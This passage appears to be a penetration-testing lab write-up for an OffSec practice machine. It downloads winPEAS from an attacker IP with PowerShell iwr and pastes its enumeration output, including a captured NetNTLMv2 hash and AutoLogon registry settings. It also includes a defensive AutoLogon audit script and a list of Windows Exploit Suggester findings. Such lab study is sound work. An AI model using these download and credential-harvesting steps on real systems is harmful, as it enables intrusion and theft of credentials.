PEAS
Conducting an automated enumeration after performing a manual enumeration
PS C:\Users\divine> iwr -Uri http://192.168.45.155/winPEASx64.exe -OutFile .\winPEASx64.exe
Delivery complete
Executing PEAS
ENV
╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables
COMPUTERNAME: REMOTE-PC
PSExecutionPolicyPreference: Bypass
HOMEPATH: \Users\divine
LOCALAPPDATA: C:\Users\divine\AppData\Local
PSModulePath: C:\Users\divine\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
PROCESSOR_ARCHITECTURE: AMD64
Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Users\divine\AppData\Local\Microsoft\WindowsApps;
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ProgramFiles(x86): C:\Program Files (x86)
PROCESSOR_LEVEL: 25
LOGONSERVER: \\REMOTE-PC
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
HOMEDRIVE: C:
SystemRoot: C:\WINDOWS
SESSIONNAME: Console
ALLUSERSPROFILE: C:\ProgramData
DriverData: C:\Windows\System32\Drivers\DriverData
USERPROFILE: C:\Users\divine
FPS_BROWSER_APP_PROFILE_STRING: Internet Explorer
APPDATA: C:\Users\divine\AppData\Roaming
PROCESSOR_REVISION: 1101
USERNAME: divine
CommonProgramW6432: C:\Program Files\Common Files
TEMP: C:\Users\divine\AppData\Local\Temp
OneDrive: C:\Users\divine\OneDrive
CommonProgramFiles: C:\Program Files\Common Files
OS: Windows_NT
USERDOMAIN_ROAMINGPROFILE: REMOTE-PC
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 17 Stepping 1, AuthenticAMD
ComSpec: C:\WINDOWS\system32\cmd.exe
PROMPT: $P$G
SystemDrive: C:
FPS_BROWSER_USER_PROFILE_STRING: Default
ProgramFiles: C:\Program Files
NUMBER_OF_PROCESSORS: 2
TMP: C:\Users\divine\AppData\Local\Temp
ProgramData: C:\ProgramData
ProgramW6432: C:\Program Files
windir: C:\WINDOWS
USERDOMAIN: REMOTE-PC
PUBLIC: C:\Users\Public
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables
ComSpec: C:\WINDOWS\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\WINDOWS\TEMP
TMP: C:\WINDOWS\TEMP
USERNAME: SYSTEM
windir: C:\WINDOWS
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 25
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 17 Stepping 1, AuthenticAMD
PROCESSOR_REVISION: 1101
N/A
AV
UAC
PowerShell
NTLM
divine::REMOTE-PC:1122334455667788:30eca8c0dfdced024fecaedea5f06e5a:0101000000000000fa4760ded3afdb01a0fc8ad3acae8452000000000800300030000000000000000000000000200000719de87947e6fe561bef7d90965917aed3c97a8062319881d6991122ba59657c0a00100000000000000000000000000000000000090000000000000000000000
.NET
Token Privileges (divine)
RDP Session
AutoLogon
PS C:\Users\divine> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
LastLogOffEndTimePerfCounter REG_QWORD 0x3eec4d37
ShutdownFlags REG_DWORD 0x8000022b
Userinit REG_SZ C:\Windows\system32\userinit.exe,
DisableCad REG_DWORD 0x1
DisableLockWorkstation REG_DWORD 0x0
EnableFirstLogonAnimation REG_DWORD 0x1
AutoLogonSID REG_SZ S-1-5-21-2619112490-2635448554-1147358759-1002
LastUsedUsername REG_SZ divine
AutoAdminLogon REG_SZ 1
DefaultUserName REG_SZ divine
DefaultDomainName REG_SZ DESKTOP-8OB2COP
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey
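The reg query above shows AutoAdminLogon set to 1 for divine but no DefaultPassword value, which is the pattern to flag. The following PowerShell audit is an added example, not part of the original notes or of winPEAS; it reads the same Winlogon key and classifies the finding (the function name Get-AutoLogonAudit and the severity labels are my own).

```powershell
# Added example: audit the Winlogon AutoLogon configuration queried above.
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

function Get-AutoLogonAudit {
    param([string]$KeyPath = $winlogon)

    # Get-ItemProperty returns every value under the key as a property.
    $props = Get-ItemProperty -Path $KeyPath -ErrorAction Stop

    $enabled = ($props.AutoAdminLogon -eq '1')
    # DefaultPassword only exists when the password is stored in cleartext;
    # when it is absent but autologon is on, the credential has typically
    # been moved into LSA secrets by the Autologon tooling instead.
    $plaintext = [bool]$props.PSObject.Properties['DefaultPassword']

    $finding = 'None: AutoAdminLogon disabled'
    if ($enabled -and $plaintext) {
        $finding = 'HIGH: AutoAdminLogon enabled and DefaultPassword stored in cleartext in the registry'
    } elseif ($enabled) {
        $finding = 'MEDIUM: AutoAdminLogon enabled; credential held in LSA secrets, recoverable by local administrators'
    }

    [pscustomobject]@{
        AutoAdminLogon    = $props.AutoAdminLogon
        DefaultUserName   = $props.DefaultUserName
        DefaultDomainName = $props.DefaultDomainName
        PlaintextPassword = $plaintext
        Finding           = $finding
        # Remediation for either finding: disable autologon and remove the stored value.
        Remediation       = if ($enabled) {
            "Set-ItemProperty '$KeyPath' AutoAdminLogon '0'; Remove-ItemProperty '$KeyPath' DefaultPassword -ErrorAction SilentlyContinue"
        } else { 'n/a' }
    }
}

Get-AutoLogonAudit | Format-List
```

On the host above this reports the MEDIUM case: AutoAdminLogon is 1 for divine with no DefaultPassword value present.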
Services
RemoteMouseService
Modifiables
DNS Cached
WESNG
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mice]
└─$ wes --update ; wes sysinfo --exploits-only --hide "Internet Explorer" Edge Flash
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Updating definitions
[+] Obtained definitions created at 20250412
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
- Name: Windows 10 Version 20H2 for x64-based Systems
- Generation: 10
- Build: 19042
- Version: 20H2
- Architecture: x64-based
- Installed hotfixes (6): KB5007289, KB4562830, KB4580325, KB5007186, KB5006753, KB5005699
[+] Loading definitions
- Creation date of definitions: 20250412
[+] Determining missing patches
[+] Applying display filters
[!] Found vulnerabilities!
Date: 20210413
CVE: CVE-2021-27094
KB: KB5001330
Title: Windows Early Launch Antimalware Driver Security Feature Bypass Vulnerability
Affected product: Windows 10 Version 20H2 for x64-based Systems
Affected component: Windows ELAM
Severity: Important
Impact: Security Feature Bypass
Exploits: https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66, https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66
Date: 20210413
CVE: CVE-2021-27094
KB: KB5001330
Title: Windows Early Launch Antimalware Driver Security Feature Bypass Vulnerability
Affected product: Windows 10 Version 20H2 for x64-based Systems
Affected component: Windows ELAM
Severity: Important
Impact: Security Feature Bypass
Exploits: https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66, https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66
Date: 20210413
CVE: CVE-2021-28447
KB: KB5001330
Title: Windows Early Launch Antimalware Driver Security Feature Bypass Vulnerability
Affected product: Windows 10 Version 20H2 for x64-based Systems
Affected component: Windows Early Launch Antimalware Driver
Severity: Important
Impact: Security Feature Bypass
Exploits: https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66, https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66
Date: 20210413
CVE: CVE-2021-28447
KB: KB5001330
Title: Windows Early Launch Antimalware Driver Security Feature Bypass Vulnerability
Affected product: Windows 10 Version 20H2 for x64-based Systems
Affected component: Windows Early Launch Antimalware Driver
Severity: Important
Impact: Security Feature Bypass
Exploits: https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66, https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66
[-] Missing patches: 1
- KB5001330: patches 4 vulnerabilities
[I] KB with the most recent release date
- ID: KB5001330
- Release date: 20210413
[+] Done. Displaying 4 of the 211 vulnerabilities found.
N/